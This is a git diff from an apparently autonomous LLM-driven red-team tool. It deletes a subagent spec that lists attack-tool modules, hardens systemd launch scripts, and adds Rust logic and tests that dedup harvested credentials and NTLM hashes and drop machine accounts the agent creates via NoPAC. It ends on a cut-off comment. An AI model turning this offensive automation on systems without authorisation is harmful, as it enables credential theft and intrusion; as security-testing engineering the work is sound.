diff --git a/.claude/agents/python-ares-expert.md b/.claude/agents/python-ares-expert.md deleted file mode 100644 index 4663ce3e..00000000 --- a/.claude/agents/python-ares-expert.md +++ /dev/null @@ -1,131 +0,0 @@ ---- -name: python-ares-expert -description: Expert on the Python ares codebase at ../ares (src/ares/). Use when you need to understand Python ares architecture, look up how something works in Python, find equivalent implementations, or answer questions about the original Python system before porting to Rust. -tools: Read, Glob, Grep, Bash -model: sonnet ---- - -You are an expert on the **Python ares codebase** located at `/Users/l/dreadnode/ares`. Your job is to answer questions about the Python implementation accurately by reading the actual source code. - -## Project Overview - -Ares is an autonomous security operations multi-agent system with: - -- **Red Team**: LLM-powered penetration testing with coordinator/worker architecture -- **Blue Team**: SOC alert investigation and threat hunting - -Built on the Dreadnode Agent SDK, rigging (LLM framework), and MITRE ATT&CK. - -## Codebase Layout - -``` -/Users/l/dreadnode/ares/ - src/ares/ - core/ # Core framework - dispatcher/ # Task dispatcher (routing, throttling, result processing, publishing) - worker/ # Worker agent (_worker.py, operations.py, prompts.py, dc_resolution.py) - orchestrator/ # Orchestrator (_orchestrator.py) - factories/ # Agent factories (red_agents.py, blue_factory.py) - replay/ # Deterministic replay - persistent_store/ # Persistent storage - blue_dispatcher/ # Blue team dispatcher - blue_worker/ # Blue team worker - models.py # ALL data models (Credential, Host, Hash, Target, SharedRedTeamState, etc.) 
- config.py # Configuration loading - state_backend.py # Redis state backend (red team) - blue_state_backend.py # Redis state backend (blue team) - task_queue.py # Redis task queue (red team) - blue_task_queue.py # Redis task queue (blue team) - redis_client.py # Redis client wrapper - recovery.py # Checkpoint/recovery - persistence.py # State serialization - workflows.py # Credential expansion workflows - engines.py # Question generation engines - correlation.py # Red-Blue correlation - evidence_validation.py # Evidence dedup/validation - k8s_executor.py # Kubernetes pod execution - lateral_analyzer.py # Graph-based lateral movement - messages.py # Inter-agent messages - orchestrator_client.py # Client for orchestrator communication - orchestrator_service.py # Orchestrator service pod - query_resilience.py # Query retry logic - remote.py # Remote K8s execution - templates.py # Jinja2 template loading - tracing.py # OpenTelemetry tracing - capability_registry.py # Agent capability registration - context_manager.py # LLM context window management - tool_retrieval.py # Dynamic tool loading - circuit_breaker.py # Circuit breaker pattern - tools/ - red/ # Red team tools - credential_discovery/ # discovery.py, harvesting.py, cracking.py, pilfering.py - reconnaissance.py # nmap, enum4linux, user/share enumeration - orchestrator.py # Dispatch functions - kerberos_attacks.py # Delegation, tickets, ADCS - lateral_movement.py # psexec, wmi, smb, evil-winrm - acl_attacks.py # bloodyAD, pywhisker, dacledit - privilege_escalation.py - coercion.py # PetitPotam, Coercer, relay - cve_exploits.py - reporting.py - common.py - blue/ # Blue team tools - investigation.py, grafana.py, query_templates.py, observability.py, actions.py, learning.py - shared/ - mitre.py # MITRE ATT&CK integration - agents/ - red/ # Red team agents (dynamic via factories) - blue/ - soc_investigator.py # SOC investigation orchestrator - integrations/ # Third-party integrations - reports/ # Report generation 
(investigation.py, redteam.py, blueteam.py) - eval/ # Evaluation framework - templates/ # Jinja2 prompt templates - redteam/agents/ # Per-role agent prompts (orchestrator.md.jinja, recon.md.jinja, etc.) - main.py # CLI entry point - cli_ops.py # CLI operations (loot, status, inject, etc.) - cli_blue_ops.py # Blue team CLI operations - cli_history.py # CLI history - tests/ # Test suite - docs/ - codemap.md # Full codebase map - red.md # Red team architecture (AUTHORITATIVE) - blue.md # Blue team workflow - config/ - multi-agent-production.yaml # Agent configurations -``` - -## Multi-Agent Architecture - -- **Orchestrator**: Central LLM coordinator, dispatches tasks, never executes tools directly -- **Workers**: RECON, CREDENTIAL_ACCESS, CRACKER, ACL, PRIVESC, LATERAL, COERCION -- **Communication**: Redis pub/sub + task queues -- **State**: Write-through cache (memory + Redis persistence) -- **Namespace**: `attack-simulation` in Kubernetes - -## Key Design Patterns - -1. **Write-through cache**: `SharedRedTeamState` in memory, persisted to Redis via `state_backend.py` -2. **Task queue**: Redis-based with priority routing in `task_queue.py` -3. **Result processing**: `dispatcher/result_processing.py` extracts credentials/hashes from tool output -4. **Publishing**: `dispatcher/publishing.py` broadcasts discovered credentials to all agents -5. **Recovery**: `recovery.py` can restore operation state from Redis checkpoints -6. **Factory pattern**: `factories/red_agents.py` maps AgentRole -> toolsets (ROLE_TOOLSETS) - -## How to Answer Questions - -1. **Always read the actual source files** before answering - don't guess from the layout alone -2. Start with the most relevant file based on the question -3. For architecture questions, read `docs/red.md` and `docs/codemap.md` -4. For model/data questions, read `src/ares/core/models.py` -5. For tool implementations, read the specific file in `src/ares/tools/red/` -6. 
For orchestration logic, read `src/ares/core/dispatcher/` and `src/ares/core/orchestrator/` -7. Be precise: include file paths, function names, and line numbers -8. When asked "how does X work", trace the full code path - -## Important Context - -- This codebase is being ported to Rust (the parent project at `/Users/l/dreadnode/ares-rust-cli/ares-rust/`) -- Questions will often be about understanding the Python implementation to inform the Rust port -- The Python codebase uses: rigging (LLM), loguru (logging), redis, kubernetes, cyclopts (CLI), pydantic (models) -- Domain conventions: `contoso.local` (primary), `fabrikam.local` (secondary), `192.168.58.x` subnet diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml index bbe3514b..81496a89 100644 --- a/.taskfiles/ec2/Taskfile.yaml +++ b/.taskfiles/ec2/Taskfile.yaml @@ -966,6 +966,7 @@ tasks: SECRETS_ID: '{{.SECRETS_ID | default "ares/api-keys"}}' LLM_MODEL: '{{.LLM_MODEL | default ""}}' FLUSH_REDIS: '{{.FLUSH_REDIS | default "true"}}' + OPERATION_ID: '{{.OPERATION_ID | default ""}}' cmds: - | INSTANCE_ID=$(aws ec2 describe-instances \ @@ -981,7 +982,11 @@ tasks: exit 1 fi - OP_ID="op-$(date -u +%Y%m%d-%H%M%S)" + if [ -n "{{.OPERATION_ID}}" ]; then + OP_ID="{{.OPERATION_ID}}" + else + OP_ID="op-$(date -u +%Y%m%d-%H%M%S)" + fi echo -e "{{.INFO}} Operation ID: $OP_ID" # Build target IPs JSON array diff --git a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl index 619a4bc2..27fe3f57 100755 --- a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl +++ b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl @@ -1,6 +1,11 @@ #!/bin/bash -# Launch ares orchestrator with environment variables -# Placeholders are substituted by the calling task via envsubst/sed +# Launch ares orchestrator in its own systemd transient unit so it (and any +# tool subprocesses it spawns) gets its own cgroup, separate from +# amazon-ssm-agent.service. 
Otherwise everything launched by SSM +# RunShellScript inherits SSM's cgroup and competes with it for memory — +# resulting in CONSTRAINT_MEMCG OOM-kills regardless of OOMScoreAdjust. +set -euo pipefail + export ARES_REDIS_URL=redis://127.0.0.1:6379 export RUST_LOG=info export ARES_OPERATION_ID='__ARES_PAYLOAD__' @@ -25,13 +30,56 @@ if [ -n "$_blue_model" ] && [ "$_blue_model" = "${_blue_model#__}" ]; then fi export ARES_DEPLOYMENT='__ARES_DEPLOYMENT__' export ARES_CONFIG=/etc/ares/config.yaml +export ARES_MAX_CONCURRENT_TASKS=8 _otel_endpoint='__OTEL_TRACES_ENDPOINT__' if [ -n "$_otel_endpoint" ] && [ "$_otel_endpoint" = "${_otel_endpoint#__}" ]; then export OTEL_EXPORTER_OTLP_TRACES_ENDPOINT="$_otel_endpoint" export OTEL_EXPORTER_OTLP_PROTOCOL='http/protobuf' export OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red' fi + +mkdir -p /var/log/ares + +# Stop any prior orchestrator (transient unit or stray nohup process). +systemctl stop ares-orchestrator.service 2>/dev/null || true +systemctl reset-failed ares-orchestrator.service 2>/dev/null || true pkill -f 'ares orchestrator' 2>/dev/null || true sleep 1 -nohup /usr/local/bin/ares orchestrator >/var/log/ares/orchestrator.log 2>&1 & -echo "Orchestrator started (PID: $!)" + +# Spawn as a transient systemd service in system-ares.slice. --setenv=NAME +# (no value) inherits from current environment, preserving quoting that +# would otherwise be mangled by EnvironmentFile parsing of JSON payloads. 
+exec systemd-run \ + --unit=ares-orchestrator.service \ + --slice=system-ares.slice \ + --description="Ares Orchestrator (transient)" \ + --collect \ + --setenv=ARES_REDIS_URL \ + --setenv=RUST_LOG \ + --setenv=ARES_OPERATION_ID \ + --setenv=OPENAI_API_KEY \ + --setenv=ANTHROPIC_API_KEY \ + --setenv=DREADNODE_API_KEY \ + --setenv=DREADNODE_SERVER_URL \ + --setenv=DREADNODE_ORGANIZATION \ + --setenv=DREADNODE_WORKSPACE \ + --setenv=DREADNODE_PROJECT \ + --setenv=GRAFANA_SERVICE_ACCOUNT_TOKEN \ + --setenv=GRAFANA_URL \ + --setenv=ARES_LLM_MODEL \ + --setenv=ARES_TOOL_DISPATCH \ + --setenv=ARES_BLUE_ENABLED \ + --setenv=ARES_BLUE_LLM_MODEL \ + --setenv=ARES_DEPLOYMENT \ + --setenv=ARES_CONFIG \ + --setenv=ARES_MAX_CONCURRENT_TASKS \ + --setenv=OTEL_EXPORTER_OTLP_TRACES_ENDPOINT \ + --setenv=OTEL_EXPORTER_OTLP_PROTOCOL \ + --setenv=OTEL_RESOURCE_ATTRIBUTES \ + --property=StandardOutput=append:/var/log/ares/orchestrator.log \ + --property=StandardError=append:/var/log/ares/orchestrator.log \ + --property=OOMScoreAdjust=-500 \ + --property=TasksMax=4096 \ + --property=MemoryHigh=8G \ + --property=MemoryMax=10G \ + /usr/local/bin/ares orchestrator diff --git a/.taskfiles/ec2/scripts/setup.sh b/.taskfiles/ec2/scripts/setup.sh index f073ecfd..858fcfd8 100755 --- a/.taskfiles/ec2/scripts/setup.sh +++ b/.taskfiles/ec2/scripts/setup.sh @@ -21,6 +21,46 @@ fi echo "=== Creating directories ===" mkdir -p /var/log/ares /etc/ares +echo "=== Removing legacy ares-worker@ unit (renamed in PR #226) ===" +if [ -f /etc/systemd/system/ares-worker@.service ]; then + for role in recon credential_access cracker acl privesc lateral coercion; do + systemctl disable --now "ares-worker@${role}.service" 2>/dev/null || true + done + rm -f /etc/systemd/system/ares-worker@.service +fi + +echo "=== Creating system-ares.slice with global memory cap ===" +cat >/etc/systemd/system/system-ares.slice <<'SLICE_EOF' +[Unit] +Description=Ares system slice (orchestrator + workers) +Before=slices.target + 
+[Slice] +MemoryMax=12G +MemoryHigh=10G +TasksMax=8192 +SLICE_EOF + +echo "=== Ensuring 4G swap file (OOM cushion) ===" +if [ ! -f /swapfile ] || [ "$(stat -c%s /swapfile 2>/dev/null || echo 0)" -lt 4000000000 ]; then + swapoff /swapfile 2>/dev/null || true + rm -f /swapfile + fallocate -l 4G /swapfile || dd if=/dev/zero of=/swapfile bs=1M count=4096 + chmod 600 /swapfile + mkswap /swapfile + swapon /swapfile + if ! grep -q '^/swapfile' /etc/fstab; then + echo '/swapfile none swap sw 0 0' >>/etc/fstab + fi +fi + +echo "=== Tuning OOM behavior (oom_kill_allocating_task, swappiness) ===" +cat >/etc/sysctl.d/90-ares.conf <<'SYSCTL_EOF' +vm.oom_kill_allocating_task = 1 +vm.swappiness = 10 +SYSCTL_EOF +sysctl -p /etc/sysctl.d/90-ares.conf >/dev/null + echo "=== Creating systemd worker template unit ===" cat >/etc/systemd/system/ares@.service <<'UNIT_EOF' [Unit] @@ -42,9 +82,19 @@ RestartSec=5 StandardOutput=append:/var/log/ares/%i.log StandardError=append:/var/log/ares/%i.log +# Contain child processes (netexec, hashcat, nmap, etc.) within this cgroup. +# Without these limits, runaway tool processes can OOM the entire system and +# take down the SSM agent (see: Apr 2026 incident). +Delegate=yes +Slice=system-ares.slice +MemoryHigh=1500M +MemoryMax=2G +TasksMax=256 + [Install] WantedBy=multi-user.target UNIT_EOF +systemctl daemon-reload echo "=== Installing cracking tools ===" if ! command -v hashcat >/dev/null 2>&1 || ! 
command -v john >/dev/null 2>&1; then diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 73b2119a..5bf48a28 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -738,6 +738,7 @@ tasks: BLUE_ENABLED: '{{.BLUE_ENABLED | default "0"}}' BLUE_LLM_MODEL: '{{.BLUE_LLM_MODEL | default ""}}' EC2_DEPLOYMENT: '{{.EC2_DEPLOYMENT | default "alpha-operator-range"}}' + STRATEGY: '{{.STRATEGY | default "comprehensive"}}' RESOLVED_TARGETS: sh: | TARGET="{{.TARGET}}" @@ -867,7 +868,7 @@ tasks: # Build JSON payload for ARES_OPERATION_ID TARGET_IPS_JSON=$(echo "{{.RESOLVED_TARGETS}}" | tr ',' '\n' | sed 's/^/"/;s/$/"/' | paste -sd, - | sed 's/^/[/;s/$/]/') - ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\"}" + ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\",\"strategy\":\"{{.STRATEGY}}\"}" # Build orchestrator launch script from template ORCH_SCRIPT=$(mktemp) diff --git a/Cargo.lock b/Cargo.lock index c3ce37e8..780c8df5 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -189,6 +189,7 @@ dependencies = [ "anyhow", "approx", "ares-core", + "base64", "chrono", "redis", "regex", diff --git a/ansible/playbooks/ares/goad_attack_box.yml b/ansible/playbooks/ares/goad_attack_box.yml index 2cc04435..5c4cccbf 100644 --- a/ansible/playbooks/ares/goad_attack_box.yml +++ b/ansible/playbooks/ares/goad_attack_box.yml @@ -32,7 +32,7 @@ alloy_deployment_name: "goad-attack-box" alloy_server_id: "" alloy_instance_id: "" - alloy_loki_endpoint: "{{ alloy_loki_endpoint }}" + alloy_loki_endpoint: "{{ lookup('env', 'ALLOY_LOKI_ENDPOINT') | default('http://localhost:3100/loki/api/v1/push', true) }}" alloy_version: "1.10.1" # Python version @@ -113,9 +113,14 @@ changed_when: true roles: - # AWS infrastructure agents + # AWS infrastructure agents — 
skipped on non-AWS clouds because they + # require the EC2 instance metadata service (cloudwatch-agent's + # `fetch-config -m ec2` hits 169.254.169.254 and aborts the build + # on Azure). - role: dreadnode.nimbus_range.aws_ssm_agent + when: cloud_provider | default('aws') == 'aws' - role: dreadnode.nimbus_range.aws_cloudwatch_agent + when: cloud_provider | default('aws') == 'aws' # Base Ares requirements - role: dreadnode.nimbus_range.base diff --git a/ares-cli/src/dedup/credentials.rs b/ares-cli/src/dedup/credentials.rs index d31ae140..416d0401 100644 --- a/ares-cli/src/dedup/credentials.rs +++ b/ares-cli/src/dedup/credentials.rs @@ -5,7 +5,7 @@ use std::sync::LazyLock; use ares_core::models::Credential; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; /// Strip ANSI escape sequences from text. pub(super) static RE_ANSI: LazyLock = @@ -75,6 +75,9 @@ pub(crate) fn sanitize_credentials(creds: &mut Vec) { if username.starts_with("evil") && username.ends_with('$') { return false; } + if is_ghost_machine_account(&username) { + return false; + } true }); } diff --git a/ares-cli/src/dedup/domains.rs b/ares-cli/src/dedup/domains.rs index b0bd5a0c..82818add 100644 --- a/ares-cli/src/dedup/domains.rs +++ b/ares-cli/src/dedup/domains.rs @@ -179,12 +179,14 @@ pub(crate) fn normalize_state_domains( { let mut valid_domains: HashSet = HashSet::new(); + let mut host_fqdns: HashSet = HashSet::new(); if let Some(td) = target_domain { valid_domains.insert(td.to_lowercase()); } for host in hosts { if !host.hostname.is_empty() && host.hostname.contains('.') { let lower = host.hostname.to_lowercase(); + host_fqdns.insert(lower.clone()); let parts: Vec<&str> = lower.split('.').collect(); if parts.len() > 1 { valid_domains.insert(parts[1..].join(".")); @@ -193,10 +195,20 @@ pub(crate) fn normalize_state_domains( } for user in users { if !user.domain.is_empty() { - valid_domains.insert(user.domain.to_lowercase()); + let d = 
user.domain.to_lowercase(); + // Skip user.domain values that are actually a host FQDN — + // some parsers misattribute and assign the DC's FQDN as the + // user's AD domain, which would otherwise let the FQDN survive + // the retain() filter below as a phantom "domain". + if !host_fqdns.contains(&d) { + valid_domains.insert(d); + } } } - domains.retain(|d| valid_domains.contains(&d.to_lowercase())); + domains.retain(|d| { + let lower = d.to_lowercase(); + valid_domains.contains(&lower) && !host_fqdns.contains(&lower) + }); } } diff --git a/ares-cli/src/dedup/hashes.rs b/ares-cli/src/dedup/hashes.rs index 184bbec8..26c84e1f 100644 --- a/ares-cli/src/dedup/hashes.rs +++ b/ares-cli/src/dedup/hashes.rs @@ -1,9 +1,9 @@ -use std::collections::HashSet; +use std::collections::{HashMap, HashSet}; use ares_core::models::Hash; use super::credentials::strip_ansi; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; fn normalize_hash_type(hash_type: &str) -> String { match hash_type.trim().to_lowercase().as_str() { @@ -17,20 +17,58 @@ fn normalize_hash_type(hash_type: &str) -> String { } pub(crate) fn dedup_hashes(hashes: &[Hash]) -> Vec { - let mut seen = HashSet::new(); - let mut result = Vec::new(); + // First pass: for each (username, hash_type, hash_value), remember the longest + // non-empty domain we've seen. Parsers sometimes emit the same hash twice — once + // with `DOMAIN\` prefix (populated domain) and once bare (empty domain) — and + // without this lookup the keyed-by-domain dedup keeps both as separate rows. 
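The empty-domain backfill that this `dedup_hashes` hunk implements can be summarized as a standalone sketch. The `Row` type and `backfill_and_dedup` function below are hypothetical illustrations, not the crate's `Hash` model or API: pass one records the longest non-empty domain per (username, value) pair, pass two fills bare rows from that lookup before deduplicating.

```rust
// Hedged sketch (hypothetical `Row` type, not the crate's `Hash` model) of the
// two-pass backfill: pass 1 records the longest non-empty domain per
// (username, value); pass 2 fills bare rows from that lookup, then dedups.
use std::collections::{HashMap, HashSet};

#[derive(Clone, Debug)]
struct Row {
    domain: String,
    username: String,
    value: String,
}

fn backfill_and_dedup(rows: &[Row]) -> Vec<Row> {
    // Pass 1: longest non-empty domain seen for each identity.
    let mut lookup: HashMap<(String, String), String> = HashMap::new();
    for r in rows {
        if r.domain.is_empty() {
            continue;
        }
        let key = (r.username.to_lowercase(), r.value.to_lowercase());
        lookup
            .entry(key)
            .and_modify(|d| {
                if r.domain.len() > d.len() {
                    *d = r.domain.clone();
                }
            })
            .or_insert_with(|| r.domain.clone());
    }
    // Pass 2: fill bare domains from the lookup, then dedup on the full key.
    let mut seen = HashSet::new();
    let mut out = Vec::new();
    for r in rows {
        let mut row = r.clone();
        if row.domain.is_empty() {
            if let Some(d) = lookup.get(&(row.username.to_lowercase(), row.value.to_lowercase())) {
                row.domain = d.clone();
            }
        }
        let key = (
            row.domain.to_lowercase(),
            row.username.to_lowercase(),
            row.value.to_lowercase(),
        );
        if seen.insert(key) {
            out.push(row);
        }
    }
    out
}
```

With this shape, a bare `Administrator` row and a `contoso.local\Administrator` row carrying the same hash value collapse into a single row with the populated domain.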
+ let mut domain_lookup: HashMap<(String, String, String), String> = HashMap::new(); for h in hashes { let domain = strip_trailing_dot(h.domain.trim()).to_lowercase(); - let hash_value = strip_ansi(&h.hash_value); + if domain.is_empty() { + continue; + } let key = ( - domain.clone(), h.username.trim().to_lowercase(), h.hash_type.trim().to_lowercase(), - hash_value.trim().to_lowercase(), + strip_ansi(&h.hash_value).trim().to_lowercase(), ); + domain_lookup + .entry(key) + .and_modify(|d| { + if domain.len() > d.len() { + *d = domain.clone(); + } + }) + .or_insert(domain); + } + + let mut seen = HashSet::new(); + let mut result = Vec::new(); + for h in hashes { + let username = strip_ansi(&h.username); + if is_ghost_machine_account(&username) { + continue; + } + let username_l = h.username.trim().to_lowercase(); + let hash_type_l = h.hash_type.trim().to_lowercase(); + let hash_value = strip_ansi(&h.hash_value); + let hash_value_l = hash_value.trim().to_lowercase(); + + let mut domain = strip_trailing_dot(h.domain.trim()).to_lowercase(); + if domain.is_empty() { + if let Some(d) = domain_lookup.get(&( + username_l.clone(), + hash_type_l.clone(), + hash_value_l.clone(), + )) { + domain.clone_from(d); + } + } + + let key = (domain.clone(), username_l, hash_type_l, hash_value_l); if seen.insert(key) { let mut cleaned = h.clone(); - cleaned.domain = strip_trailing_dot(cleaned.domain.trim()).to_lowercase(); + cleaned.domain = domain; cleaned.hash_type = normalize_hash_type(&cleaned.hash_type); cleaned.hash_value = hash_value.trim().to_string(); cleaned.username = strip_ansi(&cleaned.username); diff --git a/ares-cli/src/dedup/mod.rs b/ares-cli/src/dedup/mod.rs index 9ae3550e..759d4ed7 100644 --- a/ares-cli/src/dedup/mod.rs +++ b/ares-cli/src/dedup/mod.rs @@ -7,9 +7,32 @@ pub(crate) mod users; #[cfg(test)] mod tests; -/// Strip trailing DNS root dot from domain strings (e.g. `child.contoso.local.` → `child.contoso.local`). 
+use regex::Regex; +use std::sync::LazyLock; + +/// Strip trailing DNS root dot and NetExec "0." artifact from domain strings +/// (e.g. `child.contoso.local.` → `child.contoso.local`, +/// `contoso.local0` → `contoso.local`). pub(super) fn strip_trailing_dot(s: &str) -> &str { - s.strip_suffix('.').unwrap_or(s) + let s = s.trim_end_matches('.'); + // NetExec sometimes appends "0" to domain TLDs. Strip if the char + // before the trailing 0 is alphabetic (i.e. TLD-like, not "host10"). + match s.strip_suffix('0') { + Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean, + _ => s, + } +} + +/// Auto-generated Windows hostname pattern (`WIN-` + 11 alphanumerics + optional `$`). +/// Used to filter ghost machine accounts that the agent created itself via +/// NoPAC / MachineAccountQuota — not real lab hosts, just our own residue. +static GHOST_MACHINE_ACCOUNT_RE: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)^WIN-[A-Z0-9]{11}\$?$").unwrap()); + +/// True if `username` looks like an auto-generated Windows machine account +/// (e.g. `WIN-G9FWV8ZNSCL$`) — typically agent-created via NoPAC. +pub(super) fn is_ghost_machine_account(username: &str) -> bool { + GHOST_MACHINE_ACCOUNT_RE.is_match(username.trim()) } pub(crate) use credentials::{dedup_credentials, sanitize_credentials}; diff --git a/ares-cli/src/dedup/tests.rs b/ares-cli/src/dedup/tests.rs index 37741985..2570f229 100644 --- a/ares-cli/src/dedup/tests.rs +++ b/ares-cli/src/dedup/tests.rs @@ -361,6 +361,25 @@ fn strip_trailing_dot_removes_dot() { assert_eq!(strip_trailing_dot("."), ""); } +#[test] +fn strip_trailing_dot_removes_netexec_zero_artifact() { + use super::strip_trailing_dot; + // NetExec appends "0" or "0." 
to domain names + assert_eq!(strip_trailing_dot("contoso.local0"), "contoso.local"); + assert_eq!(strip_trailing_dot("contoso.local0."), "contoso.local"); + assert_eq!( + strip_trailing_dot("child.contoso.local0"), + "child.contoso.local" + ); + assert_eq!(strip_trailing_dot("fabrikam.local0."), "fabrikam.local"); + // Must NOT strip real trailing 0 from hostnames like "host10" + assert_eq!(strip_trailing_dot("host10"), "host10"); + assert_eq!( + strip_trailing_dot("dc10.contoso.local"), + "dc10.contoso.local" + ); +} + #[test] fn strip_ansi_removes_escape_sequences() { use super::credentials::strip_ansi; @@ -621,6 +640,26 @@ fn normalize_state_domains_domain_filtering_based_on_host_fqdns() { assert!(!domains.contains(&"orphan.local".to_string())); } +#[test] +fn normalize_state_domains_drops_host_fqdn_masquerading_as_domain() { + // A parser/credential publish path sometimes pushes a DC's FQDN + // (e.g. `WIN-30DZ5NGFA7M.c26h.local`) into the domain set. The dedup + // filter must drop entries that exactly match a known host hostname, + // even when a user or credential has the FQDN in its `domain` field. + let users = vec![make_user("win-30dz5ngfa7m.c26h.local", "admin")]; + let mut creds = vec![]; + let mut hashes = vec![]; + let mut domains = vec![ + "c26h.local".to_string(), + "win-30dz5ngfa7m.c26h.local".to_string(), + ]; + let hosts = vec![make_host("192.168.58.10", "win-30dz5ngfa7m.c26h.local")]; + + normalize_state_domains(&users, &mut creds, &mut hashes, &mut domains, &hosts, None); + + assert_eq!(domains, vec!["c26h.local".to_string()]); +} + #[test] fn normalize_state_domains_domain_kept_from_target_domain() { // target_domain should cause that domain to be retained even without hosts/users. 
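The suffix rule pinned down by `strip_trailing_dot_removes_netexec_zero_artifact` above can be restated as a self-contained sketch (a standalone function mirroring, but not importing, the crate's helper): drop DNS root dots first, then drop one trailing `0` only when the preceding character is alphabetic.

```rust
// Standalone restatement of the suffix rule: trim DNS root dots, then strip a
// single trailing '0' only when the char before it is alphabetic (a TLD
// artifact like "local0"), never from real names like "host10".
fn strip_artifacts(s: &str) -> &str {
    let s = s.trim_end_matches('.');
    match s.strip_suffix('0') {
        Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean,
        _ => s,
    }
}
```

The ordering matters: trimming dots first is what lets the `"fabrikam.local0."` form reduce to `"fabrikam.local"` in a single pass.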
@@ -1055,3 +1094,118 @@ fn dedup_credentials_normalizes_username_case() { let deduped = dedup_credentials(&creds); assert_eq!(deduped[0].username, "admin"); } + +#[test] +fn is_ghost_machine_account_matches_nopac_pattern() { + use super::is_ghost_machine_account; + assert!(is_ghost_machine_account("WIN-G9FWV8ZNSCL$")); + assert!(is_ghost_machine_account("WIN-4D75DLR6UCC$")); + assert!(is_ghost_machine_account("win-bjak8xunhgd$")); + // without trailing $ + assert!(is_ghost_machine_account("WIN-3KSGCLTS7NX")); +} + +#[test] +fn is_ghost_machine_account_rejects_real_hosts() { + use super::is_ghost_machine_account; + assert!(!is_ghost_machine_account("DC01$")); + assert!(!is_ghost_machine_account("WS01$")); + assert!(!is_ghost_machine_account("WIN-2019$")); // wrong length + assert!(!is_ghost_machine_account("administrator")); + assert!(!is_ghost_machine_account("")); +} + +#[test] +fn sanitize_credentials_drops_ghost_machine_accounts() { + let mut creds = vec![ + make_cred("contoso.local", "WIN-G9FWV8ZNSCL$", "P@ss1"), + make_cred("contoso.local", "jdoe", "P@ss1"), + ]; + sanitize_credentials(&mut creds); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "jdoe"); +} + +#[test] +fn dedup_hashes_collapses_bare_and_prefixed_same_user() { + // Parsers emit the same hash twice when secretsdump output mixes + // `Administrator:RID:...` (bare) and `DOMAIN\Administrator:RID:...` (prefixed) + // — bare gets empty domain, prefixed gets the resolved FQDN. + // The bare row should be folded into the prefixed one. + let hashes = vec![ + make_hash("", "Administrator", "NTLM", "aabbccdd"), + make_hash("contoso.local", "Administrator", "NTLM", "aabbccdd"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].domain, "contoso.local"); +} + +#[test] +fn dedup_hashes_keeps_distinct_users_sharing_hash() { + // Two different users can end up with identical NTLMs (shared password). 
+ // They must NOT be folded together — dedup keys on + // (username, hash_type, hash_value), not just (hash_type, hash_value). + let hashes = vec![ + make_hash("contoso.local", "Administrator", "NTLM", "deadbeefcafe"), + make_hash("contoso.local", "svc_backup", "NTLM", "deadbeefcafe"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 2); +} + +#[test] +fn dedup_hashes_bare_with_no_domain_sibling_kept() { + // If we only ever saw the bare form, we cannot infer a domain — keep it as-is. + let hashes = vec![make_hash("", "Administrator", "NTLM", "aabbccdd")]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].domain, ""); +} + +#[test] +fn dedup_hashes_picks_longest_domain_when_multiple_known() { + // If the same user+hash appears with both a parent and a child domain (rare + // cross-forest replication artifact), prefer the longer/more-specific FQDN + // when filling in a bare entry. + let hashes = vec![ + make_hash("", "krbtgt", "NTLM", "deadbeef"), + make_hash("contoso.local", "krbtgt", "NTLM", "deadbeef"), + make_hash("child.contoso.local", "krbtgt", "NTLM", "deadbeef"), + ]; + let deduped = dedup_hashes(&hashes); + // The bare entry folds into the longest sibling; the two populated entries stay distinct. 
+ assert_eq!(deduped.len(), 2); + let domains: Vec<&str> = deduped.iter().map(|h| h.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"child.contoso.local")); +} + +#[test] +fn dedup_hashes_drops_ghost_machine_accounts() { + let hashes = vec![ + make_hash( + "contoso.local", + "WIN-4D75DLR6UCC$", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:da118ed665879916ceaacfb98e3ee74e", + ), + make_hash("contoso.local", "admin", "NTLM", "aabb"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].username, "admin"); +} + +#[test] +fn dedup_users_drops_ghost_machine_accounts() { + let nb = HashMap::new(); + let mut ghost = make_user("contoso.local", "WIN-BJAK8XUNHGD$"); + ghost.source = "kerberos_enum".to_string(); + let mut real = make_user("contoso.local", "jdoe"); + real.source = "kerberos_enum".to_string(); + let users = vec![ghost, real]; + let deduped = dedup_users(&users, &nb); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].username, "jdoe"); +} diff --git a/ares-cli/src/dedup/users.rs b/ares-cli/src/dedup/users.rs index c8087de8..9bd4abdc 100644 --- a/ares-cli/src/dedup/users.rs +++ b/ares-cli/src/dedup/users.rs @@ -2,7 +2,7 @@ use std::collections::HashMap; use ares_core::models::User; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; /// Noise usernames that should be filtered. 
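The ghost-account filter exercised by the tests above does not strictly require the `regex` crate; an equivalent regex-free predicate (a hedged sketch implementing the same `WIN-` + 11 alphanumerics + optional `$` rule, not the crate's actual implementation) could look like:

```rust
// Regex-free equivalent of GHOST_MACHINE_ACCOUNT_RE: case-insensitive "WIN-"
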